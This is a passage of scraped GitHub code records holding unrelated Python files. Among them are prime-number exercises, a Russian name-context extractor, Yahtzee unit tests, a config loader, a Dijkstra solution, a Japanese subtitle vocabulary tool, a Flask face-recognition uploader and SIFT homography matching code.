value=\"info\",\n values=[\"fatal\", \"error\", \"warning\", \"info\", \"debug\", \"trace\"],\n exclusive=True,\n uid=[],\n ),\n ]\n\n outputs = [\n desc.File(\n name=\"output\",\n label=\"SfMData\",\n description=\"Output SfMData file.\",\n value=lambda attr: desc.Node.internalFolder + os.path.basename(attr.node.input.value),\n uid=[],\n ),\n ]\n","repo_name":"alicevision/Meshroom","sub_path":"meshroom/nodes/aliceVision/PanoramaPrepareImages.py","file_name":"PanoramaPrepareImages.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":10013,"dataset":"github-code","pt":"21"} +{"seq_id":"42795974355","text":"from math import sqrt \n\ndef eh_primo(x):\n x = int(x)\n if x == 2:\n return True\n elif x < 2:\n return False\n t = 2\n while t < x:\n if x % t == 0:\n return False\n elif x % t != 0:\n t += 1\n return True\n \ndef primos_entre(a, b):\n lista = []\n x = int(a)\n y = int(b) \n while x <= y:\n if eh_primo(x) == True:\n lista.append(x)\n x += 1\n return lista","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_175/ch55_2019_04_06_01_07_32_996832.py","file_name":"ch55_2019_04_06_01_07_32_996832.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22795366969","text":"from natasha import NamesExtractor\nimport nltk\nimport os\nimport string\n# nltk.download('stopwords')\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom collections import Counter\nfrom pprint import pprint\nimport pymorphy2\nimport json\n\n\nwith open(\"fileJson2.json\", \"r\") as read_file:\n names = json.load(read_file)\nextractor = NamesExtractor()\n\n\ndef appendSpans(span, delta, spans):\n start = span[0] - delta\n end = span[1] + delta\n # spans[was_names[-1]] = {\"Start\": [], \"End\": []} # убрать\n if (was_names[-1] not in spans):\n spans[was_names[-1]] = {\"Start\": [], \"End\": []}\n k = len(spans[was_names[-1]][\"Start\"])\n includes = False\n insertPos = -1\n key = was_names\n for i in range(k):\n if start <= spans[was_names[-1]][\"Start\"][i]:\n # if (end <= spans[was_names[-1]][\"Start\"][i]):\n # spans[was_names[-1]][\"Start\"].insert(i, start)\n # spans[was_names[-1]][\"End\"].insert(i, end)\n # break\n if (spans[was_names[-1]][\"Start\"][i] <= end <= spans[was_names[-1]][\"End\"][i]):\n spans[was_names[-1]][\"Start\"][i] = start\n includes = True\n break\n elif (end >= spans[was_names[-1]][\"End\"][i]):\n spans[was_names[-1]][\"Start\"][i] = start\n spans[was_names[-1]][\"End\"][i] = end\n includes = True\n break\n elif (spans[was_names[-1]][\"Start\"][i] <= start <= spans[was_names[-1]][\"End\"][i]):\n if (spans[was_names[-1]][\"Start\"][i] <= end <= spans[was_names[-1]][\"End\"][i]):\n includes = True\n elif (end >= spans[was_names[-1]][\"End\"][i]):\n spans[was_names[-1]][\"End\"][i] = end\n includes = True\n break\n if (insertPos == -1 and spans[was_names[-1]][\"Start\"][i] <= start):\n insertPos = i\n if (includes==False):\n if (insertPos != -1):\n spans[was_names[-1]][\"Start\"].insert(insertPos, start)\n spans[was_names[-1]][\"End\"].insert(insertPos, end)\n else:\n spans[was_names[-1]][\"Start\"].append(start)\n spans[was_names[-1]][\"End\"].append(end)\n\n\ndef findX(name, start):\n name = name.replace(\"ё\", \"е\")\n lessImportant = []\n moreImportant = []\n\n for i in names:\n if (i in name and not any([j in name for j in names[i][-1]])):\n if (name.startswith(i)):\n if (len(names[i]) != 2):\n print(len(names[i]))\n print(text[max(start - 100, 0):min(len(text) - 1, start + 100)])\n print(names[i])\n inp = input()\n if (inp != \"\"):\n moreImportant.append(inp)\n else:\n moreImportant.append(names[i][0])\n\n else:\n if (len(names[i]) != 2):\n print(text[max(start - 100, 0):min(len(text) - 1, start + 100)])\n print(names[i])\n inp = input()\n if (inp != \"\"):\n lessImportant.append(inp)\n else:\n lessImportant.append(names[i][0])\n # print(names[i], end=\" \")\n\n if (len(moreImportant) != 0):\n # print(*moreImportant)\n was_names.append(moreImportant[0])\n return True\n elif (len(lessImportant) != 0):\n # print(*lessImportant)\n was_names.append(lessImportant[0])\n return True\n return False\n # print()\n\nmorph = pymorphy2.MorphAnalyzer()\n\n\n\npath = 'bil1/'\nfnames = os.listdir(path)\narr = {}\nwas_names = []\nSmallSpans = {}\nLargeSpans = {}\nborders = 200\n\n\nnothing1 = set()\nnothing2 = set()\nnothing3 = set()\n\n\nextractor = NamesExtractor()\n# Потом поменяю выбор файлов. Так пока удобнее\nfor name in range(1, 41):\n spans = {}\n # по очереди открываем файлы и извлекаем имена\n with open(path + str(name), 'r', encoding='utf-8') as f:\n text = f.read().strip()\n matches = extractor(text)\n\n for match in matches:\n first = \"\"\n second = \"\"\n last = \"\"\n if (match.fact.first) != None:\n first = match.fact.first + \" \"\n if (match.fact.middle) != None:\n second = match.fact.middle + \" \"\n if (match.fact.last) != None:\n last = match.fact.last\n\n if (findX(first + second + last, match.span[0])):\n # print(was_names[-1] == \"Илья Муромец\")\n appendSpans(match.span, 200, LargeSpans)\n appendSpans(match.span, 50, SmallSpans)\n\n # spans[was_names[-1]].append(match.span)\n\n # ------------------------------------------------------------------------------------------------------------------\n for i in range(len(was_names)):\n # Запись имен в словарь. Каждому персонажу присваивается множество персонажей, с которыми он встретился в одном тексте\n if not(was_names[i] in arr):\n arr[was_names[i]] = {\"names\": {}, \"characteristic\": [], \"smallCharacteristic\":[], \"count\": 0, \"text_number\":[]}\n\n arr[was_names[i]][\"count\"] += 1\n if (name not in arr[was_names[i]][\"text_number\"]):\n arr[was_names[i]][\"text_number\"].append(name)\n for j in range(len(was_names)):\n if (was_names[j] == was_names[i]):\n continue\n if (was_names[j] not in arr[was_names[i]][\"names\"]):\n arr[was_names[i]][\"names\"][was_names[j]] = [0, []]\n arr[was_names[i]][\"names\"][was_names[j]][0] += 1\n if name not in arr[was_names[i]][\"names\"][was_names[j]][1]:\n arr[was_names[i]][\"names\"][was_names[j]][1].append(name)\n #\n text = text.lower()\n for name in set(was_names):\n for i in range(len(LargeSpans[name][\"Start\"])):\n largeBorderLeft = max(0, LargeSpans[name][\"Start\"][i])\n smallBorderLeft = max(0, SmallSpans[name][\"Start\"][i])\n # while text[borderLeft] != ' ' and borderLeft < len(text) - 2:\n # borderLeft += 1\n largeBorderRight = min(LargeSpans[name][\"End\"][i], len(text) - 1)\n smallBorderRight = min(SmallSpans[name][\"End\"][i], len(text) - 1)\n\n # while text[borderRight] != ' ' and borderRight > 0:\n # borderRight -= 1\n arr[name][\"characteristic\"].append(text[largeBorderLeft + 1:largeBorderRight])\n arr[name][\"smallCharacteristic\"].append(text[smallBorderLeft:smallBorderRight])\n\n # Выбор поддтекста. Из этой части будет извлекаться характеристика персонажей\n # borderLeft = max(0, i[0] - 200)\n # while text[borderLeft] != ' ' and borderLeft < len(text) - 2:\n # borderLeft+=1\n # borderRight = min(i[1] + 200, len(text) - 1)\n # while text[borderRight] != ' ' and borderRight > 0:\n # borderRight -= 1\n # # subText = word_tokenize(text[borderLeft + 1:borderRight])\n # # subText = [i for i in subText if (i not in string.punctuation)]\n # # stop_words = stopwords.words('russian')\n # # stop_words.extend(['что', 'это', 'так', 'вот', 'быть', 'как', 'в', 'во', 'уж', '—', 'к', 'на', 'ко'])\n # # subText = [i for i in subText if (i not in stop_words)]\n # # characteristic = []\n # # for j in subText:\n # # p = morph.parse(j)\n # # pos = p[0].tag.POS\n # # # Характеристика строится на ос��ове прилагательных\n # # if (pos == \"ADJF\" or pos == \"ADJS\"):\n # # characteristic.append(j)\n # # print(arr[was_names[_]][\"characteristic\"])\n # arr[was_names[_]][\"characteristic\"].append(text[borderLeft + 1:borderRight])\n # # -------------------------------------------------------------------------------------------------------------------\n was_names = []\n\n\n# jsonDict = json.dumps(arr)\nprint(arr)\nwith open(\"fileJson1.json\", \"w\", encoding=\"utf-8\") as file:\n json.dump(arr, file, ensure_ascii=False)\nprint(\"ok \")\n\n# print(nothing1)\n# print(nothing2)\n# print(nothing3)\n# #\n# # pprint(arr)\n# for i in arr:\n# print(i)\n# for j in arr[i][\"names\"]:\n# print(\"\\t\", j)\n#\n#\n#\n","repo_name":"Annstasia/ComplingTrueProject","sub_path":"third.py","file_name":"third.py","file_ext":"py","file_size_in_byte":8534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9106293215","text":"y_predicted = model.predict_classes(X_test, verbose=0)\n\n# Let's display the first inputs image, the predicted labels and the true labels\nplt.figure(figsize=(12, 9))\nfor i in range(15):\n plt.subplot(3, 5, i + 1)\n plt.imshow(scaler.inverse_transform(X_test[i]).reshape(8, 8),\n cmap=plt.cm.gray_r, interpolation='nearest')\n plt.title(\"predicted label: %d\\n true label: %d\"\n % (y_predicted[i], y_test[i]))\n \nprint(\"test acc: %0.4f\" % np.mean(y_predicted == y_test))","repo_name":"timothyyu/ml_monorepo","sub_path":"lectures-labs/labs/01_keras/solutions/keras_accuracy_on_test_set.py","file_name":"keras_accuracy_on_test_set.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"2105923301","text":"import unittest\n\nfrom project_files.yahtzee_game.yahtzee_exceptions import ScoreTypeNotAvailableException, InvalidScoreException\nfrom project_files.yahtzee_game.yahtzee_scorecard import Scorecard\n\n\n\n\nclass TestYahtzeeScorecard(unittest.TestCase):\n\n def setup_method(self, method):\n self.scorecard = Scorecard(player_name=\"nobody should see this\")\n self.all_score_types = ['yahtzee',\n 'chance',\n 'ones',\n 'twos',\n 'threes',\n 'fours',\n 'fives',\n 'sixes',\n 'pair',\n 'two_pairs',\n 'triples',\n 'quadruples',\n 'small_straight',\n 'large_straight',\n 'full_house']\n\n def test_initial_total_score(self):\n self.assertEqual(self.scorecard.get_total_score(), 0)\n\n def test_taking_turn_updates_total_score(self):\n self.scorecard.score_a_turn(turn_score=5, score_type='ones')\n self.assertEqual(self.scorecard.get_total_score(), 5)\n\n def test_score_sums_multiple_turns(self):\n self.scorecard.score_a_turn(turn_score=5, score_type='ones')\n self.scorecard.score_a_turn(turn_score=13, score_type='fives')\n self.assertEqual(self.scorecard.get_total_score(), 18)\n\n def test_all_score_types_initially_available(self):\n available_score_types = self.scorecard.get_available_score_types()\n self.assertListEqual(available_score_types, self.all_score_types)\n\n def test_scoring_a_turn_removes_the_score_type_from_the_available_score_types(self):\n expected_score_types = self.all_score_types\n expected_score_types.remove('triples')\n\n self.scorecard.score_a_turn(turn_score=1, score_type='triples')\n available_score_types = self.scorecard.get_available_score_types()\n\n self.assertListEqual(available_score_types, expected_score_types)\n\n def test_throws_exception_when_score_type_is_not_available(self):\n try:\n self.scorecard.score_a_turn(turn_score=5, score_type='ones')\n self.scorecard.score_a_turn(turn_score=5, score_type='ones')\n self.fail(\"expecting an exception\")\n except ScoreTypeNotAvailableException as exception:\n self.assertEqual(exception.message, \"This score type is not currently available to you.\")\n\n def test_bad_score_values_give_exception(self):\n try:\n self.scorecard.score_a_turn(turn_score=\"hi im the best score\", score_type='ones')\n self.fail(\"expecting an exception\")\n except InvalidScoreException as exception:\n self.assertEqual(exception.message, \"Score must be a non-negative integer.\")\n\n def test_raises_exception_with_negative_score(self):\n try:\n self.scorecard.score_a_turn(turn_score=-1, score_type='ones')\n self.fail(\"expecting an exception\")\n except InvalidScoreException as exception:\n self.assertEqual(exception.message, \"Score must be a non-negative integer.\")\n\n def test_equals(self):\n scorecard1 = Scorecard(\"player\")\n scorecard2 = Scorecard(\"player\")\n self.assertEquals(scorecard1, scorecard2)\n\n scorecard1.player_name = \"player1\"\n self.assertNotEqual(scorecard1, scorecard2)\n\n scorecard1.player_name = \"player\"\n scorecard1.total_score = -1\n self.assertNotEqual(scorecard1, scorecard2)\n\n scorecard1.total_score = 0\n scorecard1.available_score_types.append(\"extra type\")\n self.assertNotEqual(scorecard1, scorecard2)\n\n scorecard2.available_score_types.append(\"different extra type\")\n self.assertNotEqual(scorecard1, scorecard2)\n","repo_name":"kiaraa/tdd_practice","sub_path":"test_files/yahtzee_scorecard_test.py","file_name":"yahtzee_scorecard_test.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23816192553","text":"import os\nimport json\nimport logging\n\nclass JsonConfig: # pragma: no cover\n \"\"\"Allow to override settings by external configuration.\"\"\"\n\n def __init__(self, config):\n \"\"\"Initialize config with dictionary.\"\"\"\n self._config = config\n self.logging = logging.getLogger(\"Settings\")\n self.logging.propagate = False\n level = logging.INFO\n if \"DEBUG\" in os.environ and (\n os.environ[\"DEBUG\"] or\n os.environ[\"DEBUG\"].lower() in (\"true\", \"t\", \"yes\", \"y\")):\n level = logging.DEBUG\n self.logging.setLevel(level)\n handler = logging.StreamHandler()\n handler.setLevel(level)\n handler.setFormatter(logging.Formatter(\"%(asctime)s [Settings] %(message)s\"))\n self.logging.addHandler(handler)\n self.logging.debug(\"Running in debug mode.\")\n\n @classmethod\n def read(cls, envvar=\"CONFIG_FILE\", filename=\"config.json\"):\n \"\"\"Read a JSON configuration file and create a new configuration.\"\"\"\n filename = os.environ.get(envvar, filename)\n directory = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n filename = directory + \"/\" + filename\n try:\n with open(filename, \"r\") as config_file:\n config = json.loads(config_file.read())\n except FileNotFoundError:\n config = {}\n\n return cls(config)\n\n def get(self, key, default=None):\n \"\"\"Retrieve settings value for a given key.\"\"\"\n value = os.environ.get(key)\n\n if value:\n self.logging.info(\"Got %s from environment.\" % key)\n self.logging.debug(value)\n return_val = value\n elif key in self._config.keys():\n self.logging.info(\"Got %s from config file.\" % key)\n self.logging.debug(value)\n return_val = self._config[key]\n else:\n return_val = default\n return return_val\n\n def get_bool(self, key, default):\n \"\"\"Retrieve boolean settings value.\"\"\"\n value = self.get(key, default)\n if isinstance(value, bool):\n return value\n return value.lower() in (\"true\", \"t\", \"yes\", \"y\")\n\n\nCONFIG = JsonConfig.read()\n\n# Config keys\n\nAPI_KEY = CONFIG.get(\"API_KEY\", None)\nLIMIT_SHARE = int(CONFIG.get(\"LIMIT_SHARE\", 100)) / 100\nDEBUG = CONFIG.get_bool(\"DEBUG\", False)\n","repo_name":"DoctressWasTaken/Lightshield_proxy","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18218001182","text":"class Solution:\n def minimumWeight(self, n: int, edges: List[List[int]], src1: int, src2: int, dest: int) -> int:\n graph1 = [[] for _ in range(n)]\n graph2 = [[] for _ in range(n)] # Reversed(graph1)\n\n for u, v, w in edges:\n graph1[u].append((v, w))\n graph2[v].append((u, w))\n\n def dijkstra(graph: List[List[Tuple[int, int]]], src: int) -> List[int]:\n dist = [math.inf] * n\n minHeap = [(0, src)] # (d, u)\n while minHeap:\n d, u = heapq.heappop(minHeap)\n if dist[u] != math.inf:\n continue\n dist[u] = d\n for v, w in graph[u]:\n heapq.heappush(minHeap, (d + w, v))\n return dist\n\n fromSrc1 = dijkstra(graph1, src1)\n fromSrc2 = dijkstra(graph1, src2)\n fromDest = dijkstra(graph2, dest)\n minWeight = min(a + b + c for a, b, c in zip(fromSrc1, fromSrc2, fromDest))\n return -1 if minWeight == math.inf else minWeight\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/2203. Minimum Weighted Subgraph With the Required Paths/2203.py","file_name":"2203.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"25738001180","text":"#!/usr/bin/env python3\n\n# srt.py -- extract vocabulary words from srt subtitles with the ability to\n# pull up definitions and grep for the words used in context\n\nimport argparse\nimport collections\nimport os\nimport random\nimport spacy\nimport subprocess\nimport sys\n\nparser = argparse.ArgumentParser(description='subtitle utilities')\nparser.add_argument('filename', type=str, nargs='*', help='input srt files')\nparser.add_argument('--brain', type=str, help='brain file')\nparser.add_argument('--min-count', type=int, help='only show words that occur at least this many times', default=2)\n\nunwanted_pos = set(['SPACE', 'SYM', 'PUNCT', 'PART', 'ADP'])\n\ndef load_srt(filename):\n data = open(filename).read()\n blocks = data.split('\\n\\n')\n lines = []\n for block in blocks:\n lines.append(''.join(block.splitlines()[2:]))\n return lines\n\ndef main():\n args = parser.parse_args()\n brain = args.brain or os.path.expanduser('~/srt.brain')\n try:\n known = set(open(brain).read().splitlines())\n except OSError:\n known = set()\n text = '\\n'.join(sum((load_srt(filename) for filename in args.filename), []))\n nlp = spacy.load('ja_core_news_md')\n doc = nlp(text)\n try:\n all_tokens = []\n for token in doc:\n all_tokens.append(token)\n token_counts = collections.Counter(token.lemma_ for token in all_tokens)\n seen_lemmas = set()\n tokens = []\n for token in all_tokens:\n if token.pos_ in unwanted_pos: continue\n if token.lemma_ in known: continue\n #if token.lemma_ in seen_lemmas: continue\n if token_counts[token.lemma_] < args.min_count: continue\n seen_lemmas.add(token.lemma_)\n tokens.append(token)\n random.shuffle(tokens)\n while tokens:\n token = tokens.pop()\n lemma = token.lemma_\n if lemma not in known:\n print(len(tokens), lemma, token.pos_)\n print('https://jisho.org/search/' + lemma)\n print('https://en.wiktionary.org/wiki/' + lemma)\n while True:\n cmd = input()\n if cmd == 'd':\n os.system(f'define {lemma} -l Japanese')\n elif cmd == 'c':\n output = subprocess.check_output(['grep', '--color=always', '-C1', token.text] + args.filename)\n print(output.decode('utf-8'), end='')\n output = subprocess.check_output(['grep', '--color=never', '-C1', token.text] + args.filename)\n p = subprocess.run(['xclip', '-in', '-selection', 'clipboard'], input=output)\n elif cmd == '':\n break\n else:\n print('?')\n known.add(lemma)\n except KeyboardInterrupt:\n print('ok bye')\n except:\n print('whoa')\n raise\n finally:\n f = open(brain, 'w')\n f.write('\\n'.join(sorted(known)))\n f.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"neynt/dotfiles3","sub_path":"bin/srt.py","file_name":"srt.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17068448603","text":"import os\r\nfrom flask import render_template\r\nfrom flask import Flask, flash, request, redirect, url_for\r\nfrom werkzeug.utils import secure_filename\r\nimport face_recognition\r\nimport os\r\nfrom cv2 import cv2\r\nimport pickle\r\n\r\nUPLOAD_FOLDER = r'Unknown Faces'\r\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\r\n\r\napp = Flask(__name__)\r\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\n\r\ndef allowed_file(filename):\r\n return '.' in filename and \\\r\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef upload_file():\r\n if request.method == 'POST':\r\n\r\n if 'file' not in request.files:\r\n flash('No file part')\r\n return redirect(request.url)\r\n file = request.files['file']\r\n\r\n if file.filename == '':\r\n flash('No selected file')\r\n return redirect(request.url)\r\n if file and allowed_file(file.filename):\r\n filename = secure_filename(file.filename)\r\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\r\n return '''\r\n \r\n Upload new File\r\n

File Uploaded

\r\n '''\r\n\r\n \r\n return '''\r\n \r\n Upload new File\r\n

Upload new File

\r\n
\r\n \r\n \r\n
\r\n '''\r\n@app.route('/predict')\r\ndef run_script():\r\n li = []\r\n\r\n KNOWN_FACES_DIR = r'Known Faces'\r\n UNKNOWN_FACES_DIR = r'Unknown Faces'\r\n TOLERANCE = 0.6\r\n FRAME_THICKNESS = 3\r\n FONT_THICKNESS = 2\r\n MODEL = 'cnn' \r\n\r\n def name_to_color(name):\r\n\r\n color = [(ord(c.lower())-97)*8 for c in name[:3]]\r\n return color\r\n\r\n print('Loading known faces...')\r\n known_faces = []\r\n known_names = []\r\n\r\n for name in os.listdir(KNOWN_FACES_DIR):\r\n print(name)\r\n for filename in os.path.join(KNOWN_FACES_DIR, \"\\\\{name}\"):\r\n print(filename)\r\n image = face_recognition.load_image_file(f'{KNOWN_FACES_DIR}\\\\{name}')\r\n encoding = face_recognition.face_encodings(image)[0]\r\n known_faces.append(encoding)\r\n known_names.append(name)\r\n print('Processing unknown faces...')\r\n\r\n for filename in os.listdir(UNKNOWN_FACES_DIR):\r\n print(f'Filename {filename}', end='')\r\n image = face_recognition.load_image_file(f'{UNKNOWN_FACES_DIR}\\\\{filename}')\r\n locations = face_recognition.face_locations(image, model=MODEL)\r\n encodings = face_recognition.face_encodings(image, locations)\r\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n\r\n\r\n print(f', found {len(encodings)} face(s)')\r\n for face_encoding, face_location in zip(encodings, locations):\r\n results = face_recognition.compare_faces(known_faces, face_encoding, TOLERANCE)\r\n match = None\r\n if True in results: \r\n match = known_names[results.index(True)]\r\n print(f'{match} this is a match')\r\n print(f' - {match} from {results}')\r\n li.append(match)\r\n \r\n return render_template('show.html', li = li)\r\n","repo_name":"sharduldalal/APISFLASKML","sub_path":"Image Upload API 2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27294004608","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport numpy as np\nimport cv2\nimport glob\nimport os\nimport zipfile as zf\nimport pickle\nfrom pathlib import Path\nimport random\nimport math\nimport scipy.ndimage\nimport scipy.io\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport sys \n\n# global variables:\nMIN_MATCH_COUNT = 24 # minimum number of matches required \nMAX_ITER = 5000 # number of iterations in ransac\nNUM_MATCH = 500 # total number of matches that we want to subsample from different locations of the image.\n # For every region in the image analysed, if it contains at least a descriptor, and \n # if the number of descriptors subsampled is fixed to N = 1, there will be 500 matches. \n # Nevertheless, some regions of the image can have no descriptors, so the total number of matches will be reduced. \n # For solving this, we can sample N > 1 descriptors from the regions of the image analysed\n\nthreshold_error = 4 # threshold error for points to be considered inliers, when performing ransac\n\n\n# In[3]:\n\n\ndef match_features(des_src, des_dest, threshold):\n '''\n Implements the Nearest Neighbor Distance Ratio Test (NNDR) - Equation 4.18 in Section 4.1.3 of \n Szeliski - to assign matches between interest points in two images. It also searches for mutual \n matches and applies the NNDR test\n \n A match is between a feature in des_src and a feature in des_dest. We can\n represent this match as the index of the feature in des_src and the index\n of the feature in des_dest\n \n :params:\n :des_src: an np array of features for interest points in source image\n :des_dest: an np array of features for interest points in destination image\n \n :returns:\n :matches: an np array of dimension k x 2 where k is the number of matches. The first\n column is an index into des_src and the second column is an index into des_dest\n '''\n \n global MIN_MATCH_COUNT\n\n matches = []\n \n # Re-normalize\n des_dest_normalize = des_dest / np.linalg.norm(des_dest, axis = 0)\n \n des_src_normalize = des_src / np.linalg.norm(des_src, axis = 0)\n \n # cosine similarity (descriptors are L2 normalized) \n matrix_similarity = des_src_normalize.T @ des_dest_normalize\n \n ind_col_matches = np.argmax(matrix_similarity, axis = 1)\n \n matches = np.concatenate((np.arange(0, des_src.shape[1]).reshape(-1,1), ind_col_matches.reshape(-1, 1)), axis = 1)\n final_matches = matches\n \n # FIND GOOD MATCHES:\n # Retrieve top 2 nearest neighbors 1->2.\n index_sorted = np.argsort(-matrix_similarity, axis = 1)[:, 0:2]\n\n matrix_distances = np.sqrt(2 - 2 * matrix_similarity)\n \n mask_good_matches = matrix_distances[list(range(0,matrix_distances.shape[0])), index_sorted[:, 0]] / matrix_distances[list(range(0,matrix_distances.shape[0])), index_sorted[:, 1]] < threshold\n \n if np.any(mask_good_matches):\n good_matches = matches[mask_good_matches, :]\n \n print(\"good matches/matches - %d/%d\" % (good_matches.shape[0],matches.shape[0]))\n \n if good_matches.shape[0] > MIN_MATCH_COUNT:\n final_matches = good_matches\n \n # FIND MUTUAL AND GOOD MATCHES: \n # Retrieve top 2 nearest neighbors 1->2.\n matches_12_top2 = np.argsort(-matrix_similarity, axis = 1)[:, 0:2]\n matches_12 = matches_12_top2[:, 0] # Save first NN and match similarity.\n \n matrix_distances = np.sqrt(2 - 2 * matrix_similarity)\n \n # Compute Lowe's ratio.\n mask1_good_matches = matrix_distances[list(range(0,matrix_distances.shape[0])), matches_12_top2[:, 0]] / matrix_distances[list(range(0,matrix_distances.shape[0])), matches_12_top2[:, 1]] < threshold\n\n # Retrieve top 2 nearest neighbors 1->2.\n matches_21_top2 = np.argsort(-matrix_similarity.T, axis = 1)[:, 0:2]\n matches_21 = matches_21_top2[:, 0] # Save first NN and match similarity.\n \n matrix_distances_T = np.sqrt(2 - 2 * matrix_similarity.T)\n \n # Compute Lowe's ratio.\n mask2_good_matches = matrix_distances_T[list(range(0,matrix_distances_T.shape[0])), matches_21_top2[:, 0]] / matrix_distances_T[list(range(0,matrix_distances_T.shape[0])), matches_21_top2[:, 1]] < threshold\n \n final_mask_good_matches = mask1_good_matches & mask2_good_matches[matches_12]\n \n # Mutual NN + symmetric ratio test.\n ids1 = np.arange(0, matrix_similarity.shape[0])\n \n mask_mutual_matches = (ids1 == matches_21[matches_12]) & final_mask_good_matches\n \n if np.any(mask_mutual_matches):\n mutual_matches = matches[mask_mutual_matches, :]\n \n if mutual_matches.shape[0] > MIN_MATCH_COUNT:\n final_matches = mutual_matches\n \n print(\"mutual and good matches/matches - %d/%d\" % (mutual_matches.shape[0],matches.shape[0]))\n\n return final_matches\n\n\n# In[4]:\n\n\ndef siftMatch(img1, img2, sift_path_ref, sift_path_image, threshold = 0.75, N = 1):\n \n global extract_sift, NUM_MATCH, subsampling\n \n if extract_sift:\n sift = cv2.SIFT_create()\n kp1, des1 = sift.detectAndCompute(img1,None)\n kp2, des2 = sift.detectAndCompute(img2,None)\n \n m =match_features(des1.T,des2.T, threshold)\n src_pts = np.float32([kp1[i].pt for i in m[:,0]]).reshape(-1,2)\n dst_pts = np.float32([kp2[i].pt for i in m[:,1]]).reshape(-1,2)\n \n else:\n data_ref = scipy.io.loadmat(sift_path_ref)\n dst = data_ref['p'] # (2,N) numpy array, where N is the total number of keypoints\n des_dest = data_ref['d'] # (128,N) numpy array, where N is the total number of keypoints\n \n data_image = scipy.io.loadmat(sift_path_image)\n src = data_image['p'] # (2,N) numpy array, where N is the total number of keypoints\n des_src = data_image['d'] # (128,N) numpy array, where N is the total number of keypoints\n \n if subsampling:\n h, w, _ = img1.shape\n \n h_subsampling = math.floor(h/4) \n \n w_subsampling = math.floor(w * h/(NUM_MATCH*h_subsampling)) \n \n regions_h = range(0, h+1, h_subsampling)\n regions_w = range(0, w+1, w_subsampling)\n \n des_src_subsampling = np.array([], dtype=np.int64).reshape(des_src.shape[0],0)\n src_subsampling = np.array([], dtype=np.int64).reshape(src.shape[0],0)\n \n id_descriptor = np.arange(des_src.shape[1])\n \n for i in range(len(regions_h)-1):\n h_region_min = regions_h[i]\n h_region_max = regions_h[i+1]-1\n \n for j in range(len(regions_w)-1):\n w_region_min = regions_w[j]\n w_region_max = regions_w[j+1]-1\n \n ind_keypoints_region = (src[0,:] > w_region_min) & (src[0,:] < w_region_max) & (src[1,:] > h_region_min) & (src[1,:] < h_region_max)\n \n if np.any(ind_keypoints_region):\n if len(ind_keypoints_region[ind_keypoints_region == True]) < N:\n num_sampling = len(ind_keypoints_region[ind_keypoints_region == True])\n \n else:\n num_sampling = N \n \n ind_d_des = random.sample(list(id_descriptor[ind_keypoints_region]), num_sampling)\n \n des_src_subsampling = np.concatenate((des_src_subsampling, des_src[:, ind_d_des]), axis = 1)\n src_subsampling = np.concatenate((src_subsampling, src[:, ind_d_des]), axis = 1)\n \n des_src = des_src_subsampling\n src = src_subsampling\n \n m =match_features(des_src,des_dest, threshold)\n \n matches_coords = np.concatenate((src[:, m[:,0]], dst[:, m[:, 1]]))\n \n src_pts = matches_coords[0:2, :].T\n dst_pts = matches_coords[2:4, :].T\n \n return src_pts, dst_pts\n\n\n# In[5]:\n\n\ndef FitHomography(selected_matches, N = 4):\n \"\"\" Compute the fitted homography matrix by using N match pairs\n \n [u] [X]\n [v] = H [Y], \n [1] [1]\n being H a 3x3 matrix \n \n This can be arranged in a system Ax = 0, where x is a column vector with \n the parameters of the homography, and A is given by:\n A = [X Y 1 0 0 0 -u.X -u.Y -u]\n [0 0 0 X Y 1 -v.X -v.Y -v]\n\n For N matches, the above matrix is vertically stacked, with 2 rows per match \n \"\"\"\n \n X = selected_matches[:,0]\n Y = selected_matches[:,1]\n u = selected_matches[:,2]\n v = selected_matches[:,3]\n \n A = []\n \n for i in range(N):\n row_1 = np.array([X[i], Y[i], 1, 0, 0, 0, -X[i]*u[i], -Y[i]*u[i], -u[i]])\n row_2 = np.array([0, 0, 0, X[i], Y[i], 1, -X[i]*v[i], -Y[i]*v[i], -v[i]])\n \n A.append(row_1)\n A.append(row_2)\n \n A = np.array(A)\n \n # V = eigvec(A.T @ A), being V.T obtained through Singular Value Decomposition (SVD)\n _, _, vT = np.linalg.svd(A)\n\n # vT is a 9×9 matrix\n # the solution x is the eigenvector corresponding to the smallest eigenvalue, \n # that is, the eigenvector corresponding to the minimum singular value, \n # leading to a row vector of 9 columns. Thus, to obtain the calibrated \n # homography H, the final solution is to reshape the obtained vector into a \n # 3x3 matrix \n H = np.reshape(vT[-1,:], (3,3))\n \n # normalized homography, dividing by the element at (3,3)\n H = H/H[2,2]\n \n return H \n\n\n# In[6]:\n\n\ndef get_errors(all_matches, H):\n \"\"\"Compute error or distance between original points and 